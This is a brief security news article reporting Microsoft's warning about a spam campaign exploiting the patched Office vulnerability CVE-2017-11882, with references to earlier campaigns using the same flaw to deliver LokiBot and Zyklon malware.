Malware spam campaign targets Office vulnerability (CVE-2017-11882)

Malware spam campaign

Microsoft is warning about a malware spam campaign targeting an Office vulnerability patched in 2017.

Microsoft’s Security Intelligence team sent out a tweet on Friday warning about an increase in campaign activity over the past few weeks. As part of the campaign, Microsoft said the spam emails deliver malicious files used to exploit CVE-2017-11882:

Office vulnerability CVE-2017-11882

Even more, Microsoft added that attackers can run malicious code even without user interaction.

Microsoft patched the Office memory corruption vulnerability CVE-2017-11882 in November of 2017 and later linked to the Equation Editor component. However, this has not deterred attacks like this one from exploiting organizations not up to date on their patching.

Readers may also refer to several other campaigns that have exploited CVE-2017-11882. In one case, an alleged Chinese-linked cyber espionage campaign Temp.Periscope targeted engineering and maritime industries in early 2018.

Also, Trend Micro researchers found attackers exploiting the same patched bug by abusing the Windows Installer service, msiexec.exe, to deliver LokiBot malware.

Finally, Security researchers from FireEye spotted hackers exploiting more recently patched Microsoft Office vulnerabilities to spread Zyklon HTTP malware.